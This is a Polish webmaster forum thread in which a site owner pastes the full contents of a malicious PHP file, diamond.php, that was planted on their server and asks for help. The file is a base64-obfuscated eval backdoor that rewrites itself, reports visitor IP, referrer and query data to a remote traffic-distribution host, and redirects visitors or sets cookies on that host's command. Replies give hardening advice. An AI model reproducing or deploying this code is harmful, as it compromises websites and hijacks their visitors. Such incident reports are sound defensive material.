Skocz do zawartości
gucek012

Atak botów na moją strone

Polecane posty

Witam,

Mam problem z botami na mojej stronie która nawet jeszcze nie wystartowała, otóż masowo tworzą mi się sesje i prawdopodobnie wysyłane są rządania do bazy. Dzisiaj zauważyłem również, że w głównym folderze stworzyły mi się same jeden pamiętam o nazwie diamond.php pliki o mniej więcej takiej zawartości. Jak w cytacie na dole. Czy ktoś mógłby mi pomóc ?

Serdecznie pozdrawiam

 

<?php $tds="

aHR0cDovL21vbmdvYWRtaW4ubmV0L2dvb2dsZWJvdC9zZWFyY2gucG9zdC5waHA="; $tdsip=""; $lin="aHR0cDovL3VuaWNlZi5vcmc=="; $esdid="s406"; $key="rHL0du8N79Y7brj5zR2n5mJDcXKfxDK7"; ?><?php //SEXTQE// ?><?php
$msxfcnyzez=strrev("edoced_46esab");$mvnpvzcmggfphbm="Ly9Db25mR3VpDQplcnJvcl9yZXBvcnRpbmcoMCk7DQppbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIGZhbHNlKTsNCi8vIGdCXlhlMVk4NXd5aHpGTnVAbmVUS2c5dDkoV21LSFY0KU5AWnBWWF90NGUwYlplMkQpTktoMTJrdnFGUnBiKDJzUFR4djNuR1drZCNnXy0tMVdERzZCMWJ0dXJnNFBaREVzLSQzMypQcFpIUFl2VF8oQ2FOUy00dzczc21AQC1zM0Vzelk4LXAwN1BiYVgwLTgwblNWN0dyZSQoTVg4X0NBaGgocURNdjFNNjB5VXVzQHUxV3kuVSFFQCFZOEtVYlRfQTV5RTZaY3NTX3pWYVd4IWZGV0NEJHY0K3pXRVNxUWhNNFpidm11NTEzZSlkVE1ZQ0ZQVjlYc0tTWXoybSlzeFFOYlRWS3cxdlU5RHVHdCFSVnE9UkZQVnJzZ056TnA0KlRXI0RycURjaClnaDcjSC5FQXVydUcoMlB3dTdtNGU1WipjOUQjc1MwMiRXZmM1cGRYQ19SQFFhbUFlLjYkbTApYUBGLlpAcndYKG1UUzVQYm5AVlQpcXVjZVpAZ3U4VDgyKWV1YWI5TUZXUkIpNmV2Rnh3Uy0tUkN6djNUc2haVVVCKWhBNjRDPT11c2Mka3A5YmZDeF4rc0BhY2N6dVlrZkNRemIyQ185V3Z1KS1QUWc9VWEwRFMpcUs0R05nYXlUNUNHc1p0REF1cWYzNTIkMHEuTkQ2bg0KJG1vZGU9JF9HRVRbIm1vZGUiXTsNCmlmKCRtb2RlPT0iY29uZmlnIiBBTkQgJGtleT09JF9HRVRbJ2tleSddKXsNCmVjaG8gJzxmb3JtIG5hbWU9ImZvcm0xIiBtZXRob2Q9InBvc3QiIGFjdGlvbj1odHRwOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10uJz9tb2RlPXNldGNvbmZpZyZrZXk9Jy4kX0dFVFsna2V5J10uJz4NCjx0YWJsZSBib3JkZXI9IjAiPjx0cj48dGQ+VERTPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0ZHMiIHZhbHVlPSInLmJhc2U2NF9kZWNvZGUoJHRkcykuJyI+PC90ZD48dGQ+VERTIElQPC90ZD4NCjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icHRkc2lwIiB2YWx1ZT0iJy4kdGRzaXAuJyI+PC90ZD48dGQ+S0VZPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSInLiRrZXkuJyI+PC90ZD4NCjwvdHI+PHRyPjx0ZD5SZXNlcnZlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0byIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkbGluKS4nIj48L3RkPjx0ZD5FU0QgSUQ8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGVzZGlkIiB2YWx1ZT0iJy4kZXNkaWQuJyI+PC90ZD4NCjx0ZCBjb2xzcGFuPSIyIj48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJvayI+PC90ZD48L3RyPjwvdGFibGU+PC9mb3JtPic7DQpkaWUoKTsNCn0NCi8vIDJWMkhXd1gkKUZudFJUbnBna3JfZCshVihoWUBHbUdNcnZGMnQ4QENAR3peWk5TIT03aDFHU2ZzRER0a3U9ZmsudG5acl45R1F1TS1lXjApa1U2MjRoNVVAdzdCVzJfRlRDeGJEPTVuZWJmdVYpZ3RzUHA1Q3dBZ0IpS3krcjUjZF9ILUFISDRYYm4xbl8hcSEwIzFObkF2Vmg2LjJ0X21yOS05YS0tcmVScCNSdUhXSF9UPShXIXZXbnl2K3d0d19SWHkwa0ZYOWI1MGNjUkFDUlRfQUckI2QydzFEYSlAMFN0WWU1UDg3aCszeD0ybl5Qa3I2RzZ6Ryp1V0BrUSpLMDUtbTJuNkM3c0tBenN6N1dIUF9hM3hhcFBOZ0teSFUpMi1zIXAhY3N0MSpfczM5Kyk4U3JXcXB5cXZaNmFiOXZYMllDbnlmOXNkKTlVVChrODVxd3EpIVUuNHk2VEREMy0oOEE0REAqYVJUU0BIMHQtcWgjRzVNIWg9UCpzcFQoOHlENDBFZSlCcld2ZVl2WGR6RGtAUTk1MHA3RDlVRTd4Xyk9c2E9dXZSQFdEZ3V0YyNWQkFxSzNDTVJCbkY1RHJaY1EyMlood3pyRjRhZVUhZmUtOXooVzFQR0M0QTB3K1kwTU4wczNyIVBDdWtrSDFFYlBVVz1BJFcrdzRQMnlWKHErMWYrd3JTYnBNI0Vecy5lNylDbUhyZSNrZCRiQkNSNkAxNW0xI3VWZCpYOWYjbVNVMXJLNzkrVlcqQUVZNXooQVZzR0dtY1pAeFk2WmVWVFRUQi5aK0hHMUdwZGN6USpTMF9QLj0oenRANnM4UHhaemdTM3owUSlkZF5RMDh6ZnJYQChXVjZ0ZjQqXnRTWVNDaz1SY1VrXipIY3RIR2s4cjUocUtrdi5HWS5aNWFud0NmRio9RjFNN1VfZ3REOGZlWTMhcDNBKWh3emEtS04jdSR0K3EhLTZUNHpUZVdNXl9RYSFZaC41K1VzeV8hTlBtXmdwVjl5NjgyYjZORVdfKiFkeHBNRG0qRzZGI19RZWFWQHJmMjQ2RGZRdlBFNVgrbnZTZnVHTnZASEZ2ZmtoNlkqaG0hPUN5NVZGdUNyVm5yOD1yc2UpYW4tJDZLcWg0ZD0NCmlmKCRtb2RlPT0ic2V0Y29uZmlnIiBBTkQgJGtleT09JF9HRVRbJ2tleSddKXsNCiRzbj1leHBsb2RlKCIvIiwgJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pOw0KZm9yZWFjaCgkc24gYXMgJHNubil7JHNjcj0kc25uO30NCiRnZXRscGE9ZmlsZSgkc2NyKTsNCiRzdHJuZz0kZ2V0bHBhWzBdOw0KJGZpbGU9ZmlsZSgkc2NyKTsgDQpmb3IoJGk9MDskaTxzaXplb2YoJGZpbGUpOyRpKyspDQppZigkaT09MCkgew0KJGthPScnLmJhc2U2NF9kZWNvZGUoJ1BEOXdhSEE9JykuJyAvL1NFWCc7DQoka2FrYT0ka2EuJ1RRRS8vICcuYmFzZTY0X2RlY29kZSgnUHo0PScpLicnOw0KJGZlbHAgPSBleHBsb2RlKCRrYWthLCAkZmlsZVskaV0pOw0KJGZpbGVbJGldPScnLmJhc2U2NF9kZWNvZGUoJ1BEOXdhSEE9JykuJyAkdGRzPSInLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJwdGRzIl0pLiciOyAkdGRzaXA9IicuJF9QT1NUWyJwdGRzaXAiXS4nIjsgJGxpbj0iJy5iYXNlNjRfZW5jb2RlKCRfUE9TVFsicHRvIl0pLiciOyAkZXNkaWQ9IicuJF9QT1NUWyJwZXNkaWQiXS4nIjsgJGtleT0iJy4kX1BPU1RbInBrZXkiXS4nIjsgJy5iYXNlNjRfZGVjb2RlKCdQejQ9JykuJycuJGtha2EuJGZlbHBbMV07DQp9DQokZnA9Zm9wZW4oJHNjciwidyIpOyANCmZwdXRzKCRmcCxpbXBsb2RlKCIiLCRmaWxlKSk7DQpmY2xvc2UoJGZwKTsNCn0NCi8vIG41TWYwU1pLKFJUNFMkTkF4YzBCdEg2dFJ0SFJncDYwcFhrQ1hDKXhQUjhVYTQ4aHZYX2I9UjhTcSFLTjZ4ejR6SCE9WXg3KmFuaHZCR1VwdFE3WEguY3UoKVBrRit0R1RFS0gjTUREdjdWa0VtWVE3ZngxeEswYWVmMTU9bjVyIUMxNF9eTWZHNFZDY1hGeFQzKndoVilRdCNudWUteCohTTRkdnY1WXo4QXUrdGQrMUF3a2R5bTJVdStzX2J0c1QqWTV0Y1Z4UWZTVmREWjlTTk1oMC49Tk5zX1Nic2tNV0A4aEdVY3c9NG5uPVlQeWJOMStAOTFWdCgrK1p1KXQoeV5iUThUY0QpMnBAI1RjcW54MVZNQEMpWnQ2Y2ZALT1zZSRncm1GWDlwOEY9XnBlVSpUJEc9c0drdDdRYVQqYW0xWTQqNDcwV2JQTSh1QWZFUnFoeTFSci1NNSokMUtfJFREVDZZWUBUc0RVTlUyblo0RkMxNm5hbS1LUG54KClYWkZ1JClwWEN1SE5NTjJyKV8qNkMrMDhtJHp1Nkc3Nm5xYldZKEFEaFFeV2dhR2Z0YmM3Y25HbVFiU3YjX1M0a1QjV1BhXjNUI2JhVlpGVms1WD0wUyhBTlhzUUEoMlkrZUZlY1JUczJEOFU2MXQwWHg0V2Q4JGc5NEFHY0hWU1lCPXNOdjAkaFcodEVtNSMxUiE9cFJBKHljKVEpazc3REByOXBzWldBQmgjLTVaaDNERWUkYWE2XlJwVEFhNU1Ecm4oPW***Wc0Zzl1NndyOC00KUFlX1BLTUJYRjRVMFQhcktfV0YtUEhhR2REZ01WOF9QJEQzWjRidkQkeHE2U3o3d0BaelJGR212cmF0RUtUcUQubWdYMjVlTjMuZ0dmITVtUUdfQkBiZ1NYKnR6LnJAYVFGUCsyYSRFWWtAaEJfQWVuNlc0ME40TUZVcHYrKFhHejJHU3NeKCMueVdSYXguNzhTUXUzVWZ0aEtQIzNWIS5UcDktRVVHWnZRUlohQkVmZnAodVl3Z2FLOE56YiFRLVEpdEhhLl5tLXNNbU5LRm1ONXFjaDRTQTRlQ1JRQ0MwWGg2LWRUPVk0UEQ1RmFhNDM2Z3Z5WkNQKURnYVN3KUROeXpVWSNUKDYuQkBIcUgwbiopeGF3JDZmKjVtWXpScEBFYXMxNmhCVVBYemtRTmRFMkV0ZlFDLlF3IXgqKThzcUIjZjE9NFMkelZ1S0FOKmZudjY3SA0KLy9zZW5kDQppZihlbXB0eSgkdGRzaXApKSB7JGRvbSA9IGV4cGxvZGUoIi8iLCBiYXNlNjRfZGVjb2RlKCR0ZHMpKTsgJGRvbT0kZG9tWzJdO30gZWxzZSB7JGRvbT0kdGRzaXA7fQ0KJGZwID0gZnNvY2tvcGVuKCRkb20sIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsNCkBzdHJlYW1fc2V0X3RpbWVvdXQoJGZwLCAzMCk7DQovLyAwY3V1TSNkMEdteFJnd2VYbU5uQU52S0E4ITU1ZkVTXk5jUyNkbkN2bnUjQ2VnK2YhMjQyY2g1MWJELkNDSFBrKEhTKkM3NDBFYWZtOUYhSGQyU212TS0uQnVYYjUtNyt0Rl5Vel9eNSFOeVVGdV96UWVncF9meUh0aHI9TTBWKkVAdXhQaCRzIVJZYl9edjFBZTFTVy5xUVNNYS4uYy4hYkZWMDJzS003NCp6RnNRNkdSX2E0emhSYStZYm40RitINDNWbW4kcmRiMFFOIW4udFRCQUNoa3JYeEZQNiQzN1F2QjFIa0B3elRGS045WFpYVDRXVHFQUT1aU3AtMSgqKEdGaGReRV4pUUctY0Y2TXEwcSt4QyE3TnIqcFZFKjQ5VWNhXzdtJDBSRlVjdHBVRzc2c1h3MEdUKUI2enhGUzZxYUZwX2deMiN6JEhAeWZEdytEMS1wZzAjNm0wXjdIQkdHYyNYM005MVEyJFoqKGREITZDVEVFSE1eLVdaZjV3RnUwQFkxdnYhQC55ITV1QmNaa0h4N1NGMTghNChYVT0qWHBxeC1YOSlEbTRhR0doNmd5V1NwNlBOUT16NDFOVG4yQFZrM3dlRl53QyFIMGNIMSplUCE0bXJuNkNZKW5wZiFUUFFkS0MtWmtaNSRnX20zZHUrTjhNSFNrREBhWVQ0WihFcTg9YSFOVz1ebUheLmItQ011bVN1N2VGNFhCJHlQemMjQENCLVV4RzheRW5tUkMyIUdCWWhkdk1iKkNwOFZLKDFWKnlmUVRFYXg3Wlp5I1E4bkJuV01kMnpFYXRILmR2RV4pREIpdWNRWXkubmNlbkVWR2NCLmIqV1IqZGZBWFdjZmhtQ0FFTl5QTTRWRDhWN1EjWnRjKGN4S2NWR3poZD1IMlF1aHV1MTF1R2MjdWtYdURkKENwOGYzMT1YWUUxLnlwTiRadlMjNV9LZTh5a2QkYlFZSHRtRkUwcDB5TSQ0KXV2ZSF2M3hCMkY4KlcxViRtekhaUFJWQTdfOGJ0ZnQ9SF5zIWNyeUtFbil2Q05ySC5QNihoMjR3OA0KaWYgKCEkZnApIHskZ290bz1iYXNlNjRfZGVjb2RlKCRsaW4pO30NCmVsc2Ugew0KJHRfZG9tPXVybGVuY29kZSgnaHR0cDovLycuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKTsNCiR0X3JlZj11cmxlbmNvZGUoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSk7DQokdF9pcD11cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pOw0KJHRfcHJveD0nbm8nO2lmKCRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdKXskdF9wcm94PSd5ZXMnO30NCiR0X2FnZW50PXVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pOw0KLy8gMkJHWmVeeGJuR1hSVk5SQFF4IWM4X0hlY2UtKCFNNGdzd3hOZ3gpRlhXdXVAVlViNV9AcSlmR3orNXh6aFF3ZjNXZkdmZlIxVXNBWGFxWCsqPVYuLUJTIVJhUDA5cTdyI3hYblRTJF43djg5MC44KGdRIzREX2J3SHohTS1LckhzKSRjNWhNd2tiMkY1blhiTkJFNmY3Y240WCFtPTRAVDVoIXMkZD1yWnB3c01OVEhkQTRUUzZFN3BnOWV2VCNrdSpobiM1dGV0PUZRNWRhQHNZRFoxKzMteksqcHVYNS1tcXhjYzA3S2NXcm53I0EkaHpoU2tfQmN2JHVodl9RbTdWQjhSMzZ6dXQqXmZuSzFEUVQ5QTRoKS54UkhZMXZOMEExUyFaTXc4MiE2d1NBWmFaMCtVPXhnZ1kzWHRUWEQjaz11JEQ0Kj1HIVdkRDdiN0dudF50dlR1QGRuKjEta0JLTXdZQFdDWEhWKGskQXdCTXojXzEqVERnbV9hOHN6NjIrQHI1UVRVI3E5TmRlNWJuck5wI1lSTTlnUyhNel8hTlk2WWcwSDRnUSEwZkVibnRWRl5AdDY2NU5VJFQzQ184ZGctKkJwVEBjMCMpYkJGOHJ5Q25eTmUhRnNzXyNVUm0hNigpMiFediFQV0JwUVEoa3NfaEVRWTFNIXZLLSMpVHBjZWVId3hUI25HKyRYVDRRem0ucHFONEE3a3VRM2MyUl5hV1JwQU1BdVk3a3MrQ20tTThEdk4oZypNKFIuTnUtK0F6Z2QyUlF4WGFCRXQzPV4hQV5hOXZHZi02UyE9NCl6KTgpKVhoZ2NScDRNcWUyMWEjME0paGJQcXdXeS4ocERreHctMUh2N010bTg3M1lwJDAod3RQKypIbUcoVTB1MF9TbVBQa1Y4UW40NUVTLipAbU55WV41ckd4IUZodl9kdyloY1k5RzZwKSghZDhzYm5rREhYLVQucFFuZVNVUkteNykwKURDZUc4blROKzFRblVuRV8tVHRBQVV6SA0KLy9mb3JlYWNoKCRfQ09PS0lFIGFzICRrZXk9PiR2YWwpIHskdF9jb29raWU9JHRfY29va2llLiImIi4ka2V5LiI9Ii4kdmFsO30NCi8vJHRfY29va2llPXVybGVuY29kZSgkdF9jb29raWUpOw0KaWYoIWVtcHR5KCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSkpIHskdF9jb29raWU9dXJsZW5jb2RlKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSk7fQ0KZWxzZSBpZighZW1wdHkoJF9TRVJWRVJbJ1BBVEhfSU5GTyddKSkgeyR0X2Nvb2tpZT11cmxlbmNvZGUoJF9TRVJWRVJbJ1BBVEhfSU5GTyddKTt9DQplbHNlIHsgJHRfY29va2llPScnOyB9DQokb3V0ID0gIkdFVCAiLmJhc2U2NF9kZWNvZGUoJHRkcykuIj9kb209Ii4kdF9kb20uIiZyZWY9Ii4kdF9yZWYuIiZpcD0iLiR0X2lwLiImcHJveD0iLiR0X3Byb3guIiZhZ2VudD0iLiR0X2FnZW50LiImY29va2llPSIuJHRfY29va2llLiImZXNkaWQ9Ii4kZXNkaWQuIiBIVFRQLzEuMFxyXG4iOw0KJG91dCAuPSAiSG9zdDogIi4kZG9tLiJcclxuIjsNCiRvdXQgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KZndyaXRlKCRmcCwgJG91dCk7DQp3aGlsZSAoIWZlb2YoJGZwKSkgew0KJHN0cj1mZ2V0cygkZnAsMTI4KTsNCmlmICgkc3RyPT0iXHJcbiIgJiYgZW1wdHkoJGhlKSkgeyAkaGUgPSAnZG8nOyB9DQppZiAoJGhlPT0nZG8nKSB7ICRnb3RvLj0kc3RyOyB9DQp9DQpmY2xvc2UgKCRmcCk7DQokZ290bz1zdWJzdHIoJGdvdG8sIDIpOw0KfQ0KLy8gMzkzaCpRQm1jZl8yZ3cxNnZadnghV0BkdlpANHRBPVIyV2sjNHp3Rms2VnA0Lm5CU3BuQD0xRVkhNFJCJG1RaE4jZ0QpWTEoI1MqY0AtVE00dVZTK3I3bmMqaHdBTjdVMFRBUWZtSFIxaFkoLj1iK3NNOWY9cWZLS14hRUR0Yk5QYWZtaCs9ZzUrZVotLmtQNEh2Q2dQMG5XQ0MyQDNBRi1uYVF5K1UzS2ReaF5NZEdmMEhFTkZ6DQokZ290b2UgPSBleHBsb2RlKCI6Ly8iLCB0cmltKCRnb3RvKSk7DQppZigkZ290b2VbMF09PSdodHRwJyB8fCAkZ290b2VbMF09PSdodHRwcycpIHsgaGVhZGVyKCdIVFRQLzEuMSAzMDIgRm91bmQnKTsgaGVhZGVyKCdMb2NhdGlvbjogJy50cmltKCRnb3RvKSk7IH0NCmlmKCRnb3RvZVswXT09J2Nvb2snKSB7ICRnb3RvZWU9ZXhwbG9kZSgiJiIsICRnb3RvZVsxXSk7IGZvcmVhY2goJGdvdG9lZSBhcyAkc2V0Y29vaykgeyAkc2V0PWV4cGxvZGUoIj0iLCAkc2V0Y29vayk7c2V0Y29va2llKCRzZXRbMF0sICRzZXRbMV0pOyB9IH0NCmlmKCRnb3RvZVswXT09J2VjaG8nKSB7IGVjaG8gJGdvdG9lWzFdOyB9DQovLyAjQ0FjZ3BDJEI3JDlNKDIocHcjI3dHSHZ1Ryo5bUtwOFlEcXZxUXM5UGZfenQoLlUha3NLLkJtUDFFM3A3YlhhYWNXPXJ2UGJIeTg9NWQheFBxIU1OUHVHcmR3cjdCRiMrV3VTQFdxcXZhaDFrLWROMl5fNHNEQ2Q3TVhIN155KHZNbTlQd2RTM3BUckJIUE50dlFZPXRkMVJiSDgkPUdaOGZaQnFALjNVQHRQbndEMD1XJEFiVjdmeVV1eSNjY3JiM01mMXlFMFJSI2NiTXVGR3dkNGRXPUdEZnpEZWYtejJaRVNLbjNGLkRCdWdeUUtjZE5XMHhkR1EhcFJ3NTBFdFY0WGJFS0QpNE03YyFZUjdXPWIhZHBnRl85JHplcDFrZ15lR3pNRFFnUmdZZEhUWW5wQmY4X2gjY3BhMWY2ITVEUmYtNyNOcUAuRFJmUDBaRmhxdFQrVzU3KEFtYnJ6Qkg0MnhiZW1iX0UudChQdFFzVTg9MGsqbUFVVkZuOHEwZEdyWSFlZGcrWFA5ejl5UFg9KChaZUUtMmNIN3N1Uk4ha3JCIyEjKCtVJEd6SFVVXlcoZ1htTVRaUFNuaE1CLWFoQiRnUWtTWWVOZkE9S1FEaG0rZ0VkWEF4K2VoOSMocDZSbnBeQzQuNCl2UnltKmJHOGJGVWQtVXFIRTc4MTM3RXhSV0hNWVFiKiRjUVpediN3Qk1wUTZEKSNadlh0UFUxQ1F5MDBIZzBlVlJaNXJoVWVSI3d4QSl3RWM4TjRBNWZlemhrMWdrVz1eOWRmX2s4Uy5jQSFVM14wQkBacC0qV1BAKS5ZYXZec1d2QEZeemtnOTVDMzFeNG5ZMjVna3pna153VnkoZipOMShtZTRxR3QjZythdjZRbUBfITdBQG53QW4jbUN6TS5FXzU0VDBBeVV1Tk5ncTcyY0IxLTdYYmI3eHQwLXNnI2RBeUVZd3pHMG16RGtoNlVRbkQhKmdrbUUtIzlUZnVANjQ9cyE9dWVVZS0ySFRlLVdhWCtXRWhidFlBWUFnNV8=";eval($msxfcnyzez($mvnpvzcmggfphbm));
?>
cleardot.gif

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

1. Zmień hasło FTP

2. Jaki CMS (joomla, WP)?

3. Będziesz musiał pozabezpieczać wszystkie formularze, robot dostał się w 99% przez jakąś dziurę w formularzu ( szablon lub plugin )

Edytowano przez GyniO (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość patrys

Jeżeli to Twój serwer to oprócz haseł możesz dodać do PHP suhosina z clamav i do Apache mod_security.

Powinno trochę pomóc na przyszłość.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jeżeli masz mysql_query:

 

Przy update/insert zabezpiecz pola dodając np mysql_real_escape_string()

Jeżeli masz upload plików - zabezpiecz sprawdzając co to za typ pliku

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Rafiki

To wirus. Dostał sie prawdopodobnie przez Twojego klienta FTP jeśli zapisujesz hasła i twój komputer był zainfekowany albo przez nieaktualne / niezabezpieczone skrypty php.

Jeśli masz Wordpressa lub joomle to na 90% ich wina - brak aktualizacji softu i wtyczek.

 

Jeśli masz autorski skrypt - moze uzywać starej wersji TinyMCE ? tymbardziej jeśli z pluginem do uploadu zdjęć - jest on bardzo dziurawy.

Co do reszty nie wiem jak masz napisany skrypt ale programując najważniejsza jest logika działania (aby system był przemyślany) no i oczywiście filtrowanie danych które wchodzą ( dodanie jedynie mysql_real_escape_string - to i tak słabe zabezpieczenie ).

 

Aby usunąc to świnstwo musisz usunąc cały kod .php pododawany przez tego wirusa w rózne pliki .php (najczęściej modyfikuje on index.php i dodaje mnóstwo swoich plików .php - jeśli masz dostęp do ssh wyświetl sobie ostatnio edytowane pliki - najprawdopobniej pojawią się te które pozmieniał żlośliwy soft jesli sam nie edytowałeś zbyt wielu plików).

Możesz wyłączyć w php.ini funkcje eval() i to też powinno pomóc :)

Edytowano przez Rafiki (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Możesz wyłączyć w php.ini funkcje eval() i to też powinno pomóc :)

W php.ini chyba nie za bardzo da się to zrobić bo eval() to nie funkcja ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Rafiki

Rzeczywiście, eval technicznie to nie funkcja ... w wielu artykułach można przeczytać ,że da sie wyłączyć przez php.ini przez disabled_functions ale w takim razie najprawdopobniej nie zadziała to rozwiązanie .... a dotychczas sam je stosowałem heh :(

 

Po poszperaniu troche w necie ... dowiedziałem ,że się da ale trzeba doinstalować suhosin, jak kogos interesuje więcej na ten temat : http://blog.securityinnovation.com/blog/2013/10/php-security-configuring-the-phpini-file-properly.html

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×